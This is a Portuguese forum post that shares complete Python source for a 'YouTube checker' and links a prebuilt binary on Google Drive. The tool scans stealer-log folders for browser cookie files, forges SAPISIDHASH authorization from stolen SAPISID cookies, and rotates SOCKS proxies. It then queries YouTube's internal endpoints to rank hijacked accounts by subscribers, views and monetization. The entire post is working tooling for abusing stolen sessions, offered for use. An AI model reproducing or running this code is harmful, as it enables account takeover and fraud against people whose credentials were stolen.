Olá a todos ! Eu queria escrever algum projeto interessante e decidi fazer um verificador do YouTube. Tudo é escrito do zero!

Comece:

Um pouco sobre o projeto - procura cookies na pasta cookies, Cookies. Ele usa meias4 ou 5, o nome do log tem o total de visualizações, vídeos e inscritos, e também mostra se esses canais tem monetização, se tiver 1 canal com monetização, ele vai escrever qual é. Bem, na verdade o ano do mínimo ao máximo. Dentro do cookie serão escritos todos os canais que estão presentes. É desejável especificar fluxos de até 100, bem, veja por si mesmo em geral.

Formato do proxy: login:pass@ip:port

Antes de começar, crie uma pasta nela, uma pasta com logs e um arquivo com proxies com a adição do nosso verificador.

Vamos começar com as fontes

import asyncio

import os

import aiofiles

import re

LOCK_READ = asyncio.Lock()

async def use_proxy(PROXIES: list):

async with LOCK_READ:

first_proxy = PROXIES.pop(0)

PROXIES.append(first_proxy)

return PROXIES, first_proxy

async def get_proxy(file_proxy):

list = []

async with LOCK_READ:

async with aiofiles.open(f'{file_proxy}', 'r', encoding='UTF-8') as file:

lines = await file.readlines()

for i in lines:

list.append(i)

return list

async def check_txt(file: str, service: str):

async with LOCK_READ:

async with aiofiles.open(file, "r", encoding='UTF-8') as file:

content = await file.read()

return service in content.lower()

async def find_paths(path: str, service: str):

cookies_folders = []

good_path = []

for root, dirs, files in os.walk(path):

for dir in dirs:

if dir in ["cookies", "Cookies"]:

cookies_folders.append(os.path.join(root, dir))

for cookie_in_folder in cookies_folders:

for cookie in os.listdir(cookie_in_folder):

path = os.path.join(cookie_in_folder, cookie)

if await check_txt(path, service):

good_path.append(path)

count_path = len(good_path)

return good_path, count_path

async def net_to_cookie(filename: str, service: str):

cookies = {}

try:

async with LOCK_READ:

with open(filename, 'r', encoding='utf-8') as fp:

for line in fp:

try:

if not re.match(r'^\#', line) and service in line:

lineFields = line.strip().split('\t')

cookies[lineFields[5]] = lineFields[6]

except:

continue

except UnicodeDecodeError:

async with LOCK_READ:

with open(filename, 'r') as fp:

for line in fp:

try:

if not re.match(r'^\#', line) and service in line:

lineFields = line.strip().split('\t')

cookies[lineFields[5]] = lineFields[6]

except:

continue

return cookies

import os

try:

LOGS_FOLDER_PATH = os.path.join(os.getcwd(), str(input('Write log folder\n')))

FILE_PROXY = os.path.join(os.getcwd(), str(input('Write socks file\n')))

TYPE_PROXY = str(input('Write type socks: socks4 or socks5\n'))

THREADS_COUNT = int(input('Write treads count\n'))

except:

exit()

import asyncio

import aiohttp

from aiohttp import ClientSession

from aiohttp_socks import ProxyConnector

from supports import find_paths, use_proxy, net_to_cookie

from imports import TYPE_PROXY, THREADS_COUNT

import aioshutil

import os

import json

import hashlib

import time

import re

import aiofiles

metric = ['subscriberCount', 'videoCount', 'totalVideoViewCount']

ORIGIN_URL = 'https://www.youtube.com'

SERVICE = 'youtube.com'

FOLDER_NAME = 'youtube'

THREADS_COUNT = THREADS_COUNT

TOTAL_PATHS = 0

CHECKED_TXT = 0

NOT_CHECKED_TXT = 0

PROXIES = []

QUEUE = asyncio.Queue()

THLOCK = asyncio.Lock()

headers = {

'authority': 'www.youtube.com',

'accept': '*/*',

'accept-language': 'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7',

'content-type': 'application/json',

'origin': 'https://www.youtube.com',

'referer': 'https://www.youtube.com/',

'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36',

'x-goog-authuser': '0',

'x-origin': 'https://www.youtube.com',

}

async def _get_authorization_headers(sapisid_cookie: str):

time_msec = int(time.time() * 1000)

auth_string = '{} {} {}'.format(time_msec, sapisid_cookie, ORIGIN_URL)

auth_hash = hashlib.sha1(auth_string.encode()).hexdigest()

sapisidhash = 'SAPISIDHASH {}_{}'.format(time_msec, auth_hash)

return sapisidhash

async def get_values(session: ClientSession, cookies: list):

try:

async with session.get('https://www.youtube.com/', cookies=cookies, headers=headers) as response:

good_data = {"context": {}}

data = await response.text()

user_key = data.split('"INNERTUBE_API_KEY":"')[1].split('"')[0]

data = data.split('"INNERTUBE_CONTEXT":')[1].split(',"INNERTUBE_CONTEXT_CLIENT_NAME"')[0]

good_data["context"] = json.loads(data)

return user_key, good_data

except Exception as e:

# print(f'[*] Error: {e}')

return None, None

async def cookies_to_str(cookies: list):

ap = []

for i in cookies:

cookie = f'{i}={cookies[i]}'

ap.append(cookie)

string_cookie = ''

for i in sorted(ap):

string_cookie = string_cookie + i + '; '

return string_cookie

async def get_users(session: ClientSession, cookies_str: str):

headers['cookie'] = cookies_str

try:

async with session.get('https://www.youtube.com/getAccountSwitcherEndpoint', headers=headers) as response:

data = await response.text()

data = json.loads(data.split(")]}'")[1])

accounts = \

data['data']['actions'][0]['getMultiPageMenuAction']['menu']['multiPageMenuRenderer']['sections'][0][

'accountSectionListRenderer']['contents'][0]['accountItemSectionRenderer']['contents']

clientCacheKeys = []

ids = []

for service in accounts:

if 'accountItem' in service:

for i in service['accountItem']['serviceEndpoint']['selectActiveIdentityEndpoint'][

'supportedTokens']:

if 'offlineCacheKeyToken' in i:

clientCacheKeys.append('UC' + i['offlineCacheKeyToken']['clientCacheKey'])

elif 'datasyncIdToken' in i:

ids.append(str(i['datasyncIdToken']['datasyncIdToken']).split('||')[0])

ids[0] = '0'

return clientCacheKeys, ids

except Exception as e:

# print(f'[*] Error: {e}')

return None

async def get_date_and_monetization(session: ClientSession, clientCacheKeys: list, ids: list, cookies: dict, cookies_str: str):

user_key, data = await get_values(session, cookies)

if (user_key and data) is not None:

hash = await _get_authorization_headers(cookies['SAPISID'])

headers = {'authority': 'www.youtube.com', 'accept': '*/*',

'accept-language': 'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7',

'content-type': 'application/json', 'origin': 'https://www.youtube.com',

'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36',

'x-origin': 'https://www.youtube.com', 'cookie': cookies_str}

monetization = []

joined_date_list = []

try:

for channelids, id in zip(clientCacheKeys, ids):

headers['authorization'] = f'SAPISIDHASH {hash.split(" ")[1]}'

headers['x-goog-pageid'] = f'{id}'

params = {

'key': f'{user_key}',

'prettyPrint': 'false',

}

data['browseId'] = f'{channelids}'

data['params'] = 'EgVhYm91dPIGBAoCEgA%3D'

async with session.post(

'https://www.youtube.com/youtubei/v1/browse',

params=params,

headers=headers,

json=data,

) as response:

values_data = await response.json()

monetization.append(

values_data['responseContext']['serviceTrackingParams'][0]['params'][3]['value'])

for key in values_data['contents']['twoColumnBrowseResultsRenderer']['tabs']:

if 'tabRenderer' in key:

for content in key['tabRenderer']:

if 'content' in content:

if 'content' in content:

joined_date = \

key['tabRenderer']['content']['sectionListRenderer']['contents'][0][

'itemSectionRenderer']['contents'][0]['channelAboutFullMetadataRenderer'][

'joinedDateText']['runs'][1]['text']

joined_date = re.search(r"\b\d{4}\b", joined_date)

joined_date_list.append(int(joined_date.group()))

return joined_date_list, monetization

except Exception as e:

# print(f'[*] Error: {e}')

return None, None

else:

return None

async def get_metric(session: ClientSession, clientCacheKeys: list, ids:list, cookies: dict, cookies_str: str):

user_key, data = await get_values(session, cookies)

if (user_key and data) is not None:

hash = await _get_authorization_headers(cookies['SAPISID'])

headers = {'authority': 'www.youtube.com', 'accept': '*/*',

'accept-language': 'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7', 'content-type': 'text/plain;charset=UTF-8',

'origin': 'https://www.youtube.com',

'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36',

'x-goog-authuser': '0', 'cookie': cookies_str}

channels_info = []

try:

for id, cid in zip(ids, clientCacheKeys):

headers['authorization'] = f'SAPISIDHASH {hash.split(" ")[1]}'

params = {

'alt': 'json',

'key': f'{user_key}',

}

if id == '0':

data = '{"channelIds":["' + cid + '"],"context":{"client":{"clientName":62,"clientVersion":"1.20230403.0.0","hl":"ru","gl":"RU","experimentIds":[]},"request":{"returnLogEntry":true,"internalExperimentFlags":[]}},"mask":{"channelId":true,"contentOwnerAssociation":{"all":false},"features":{"all":false},"metric":{"all":true},"monetizationDetails":{"all":false},"monetizationStatus":true,"permissions":{"all":false},"settings":{"coreSettings":{"featureCountry":true}}}}'

else:

data = '{"channelIds":["' + cid + '"],"context":{"client":{"clientName":62,"clientVersion":"1.20230403.0.0","hl":"ru","gl":"RU","experimentIds":[]},"request":{"returnLogEntry":true,"internalExperimentFlags":[]},"user":{"onBehalfOfUser":"' + id + '"}},"mask":{"channelId":true,"contentOwnerAssociation":{"all":false},"features":{"all":false},"metric":{"all":true},"monetizationDetails":{"all":false},"monetizationStatus":true,"permissions":{"all":false},"settings":{"coreSettings":{"featureCountry":true}}}}'

async with session.post(

'https://www.youtube.com/youtubei/v1/creator/get_creator_channels',

params=params,

headers=headers,

data=data,

) as response:

data_channel = await response.json()

for i in metric:

channels_info.append(data_channel['channels'][0]['metric'][i])

return channels_info

except Exception as e:

# print(f'[*] Error: {e}')

return None

else:

return None

async def format_value(clientCacheKeys: list, channels_info: list, joined_date: list, monetization: list):

sum1 = 0

sum2 = 0

sum3 = 0

for i in range(0, len(channels_info), 3):

sum1 += int(channels_info[i])

sum2 += int(channels_info[i + 1])

sum3 += int(channels_info[i + 2])

if 'true' in monetization:

monetization_is = 'true'

else:

monetization_is = 'false'

all_sum = [sum1, sum2, sum3, min(joined_date), max(joined_date), monetization_is]

result_dict = {}

for i in range(len(clientCacheKeys)):

result_dict[clientCacheKeys[i]] = {

'metric': channels_info[:3],

'date': joined_date[i],

'm': monetization[i]

}

channels_info = channels_info[3:]

return result_dict, all_sum

async def check_cookie(cookies: dict, cookies_str: str):

global PROXIES

PROXIES, proxy = await use_proxy(PROXIES)

connector = ProxyConnector.from_url(f'{TYPE_PROXY}://{proxy}')

async with aiohttp.ClientSession(connector=connector) as session:

try:

clientCacheKeys, ids = await get_users(session, cookies_str)

joined_date, monetization = await get_date_and_monetization(session, clientCacheKeys, ids, cookies,

cookies_str)

channels_info = await get_metric(session, clientCacheKeys, ids, cookies, cookies_str)

result_dict, all_sum = await format_value(clientCacheKeys, channels_info, joined_date, monetization)

return result_dict, all_sum

except Exception as e:

# print(f'[*] Error: {e}')

return None, None

async def write_to_file(result_dict: dict, all_sum: list, path: str):

file = os.path.join(os.getcwd(),

f'{FOLDER_NAME}\\{all_sum[2]}_VIEWS_{all_sum[1]}_VIDEOS_{all_sum[0]}_SUBS_{all_sum[3]}-{all_sum[4]}_[M]_{all_sum[5]}.txt')

await aioshutil.copy2(path, file)

async with THLOCK:

async with aiofiles.open(file, "r+", encoding='UTF-8') as file:

content = await file.read()

await file.seek(0)

for channel in result_dict:

await file.write(f'# Channel link: https://www.youtube.com/channel/{channel}\n'

f'# Subsribers: {result_dict[channel]["metric"][0]}\n'

f'# Videos: {result_dict[channel]["metric"][1]}\n'

f'# Views: {result_dict[channel]["metric"][2]}\n'

f'# Date: {result_dict[channel]["date"]}\n'

f'# Monetization: {result_dict[channel]["m"]}\n\n')

await file.write(f'# {path}\n\n')

await file.write(content)

async def worker():

global QUEUE, CHECKED_TXT, NOT_CHECKED_TXT

while not QUEUE.empty():

path = await QUEUE.get()

cookies = await net_to_cookie(path, SERVICE)

cookies_str = await cookies_to_str(cookies)

result_dict, all_sum = await check_cookie(cookies, cookies_str)

if (result_dict and all_sum) is not None:

await write_to_file(result_dict, all_sum, path)

CHECKED_TXT += 1

print(f'[*] Good cookies: {CHECKED_TXT}')

else:

NOT_CHECKED_TXT += 1

print(f'[*] Bad cookies: {NOT_CHECKED_TXT}')

async def start_youtube(LOGS_FOLDER_PATH: str, PROXIES_LIST: list):

global TOTAL_PATHS, QUEUE, CHECKED_TXT, NOT_CHECKED_TXT, PROXIES

if not os.path.exists(f'{os.getcwd()}\\{FOLDER_NAME}'):

os.mkdir(f'{os.getcwd()}\\{FOLDER_NAME}')

list_dir_files, TOTAL_PATHS = await find_paths(LOGS_FOLDER_PATH, SERVICE)

PROXIES = PROXIES_LIST

print(f'[*] Finded paths with youtube.com: {TOTAL_PATHS}')

if TOTAL_PATHS == 0:

exit()

[QUEUE.put_nowait(path) for path in list_dir_files]

treads = [asyncio.create_task(worker()) for _ in range(1, THREADS_COUNT + 1)]

await asyncio.gather(*treads)

print(f'[*] Finded cookies with youtube.com: {TOTAL_PATHS} // GOOD: {CHECKED_TXT}, BAD: {NOT_CHECKED_TXT}')

import asyncio

from supports import get_proxy

from imports import FILE_PROXY, LOGS_FOLDER_PATH

from youtube import start_youtube

async def main():

PROXIES = await get_proxy(FILE_PROXY)

await start_youtube(LOGS_FOLDER_PATH, PROXIES)

input('Press ENTER to exit')

if __name__ == '__main__':

asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())

asyncio.run(main())



Verifique o tipo de resultado

aqui está um projeto totalmente montado para facilitar o uso e não se preocupar com a montagem

Acesse VirusTotal: https://www.virustotal.com/gui/file...f … ?nocache=1

—качать: https://drive.google.com/file/d/1pheKjI … FG1G_/view ? usp=share_link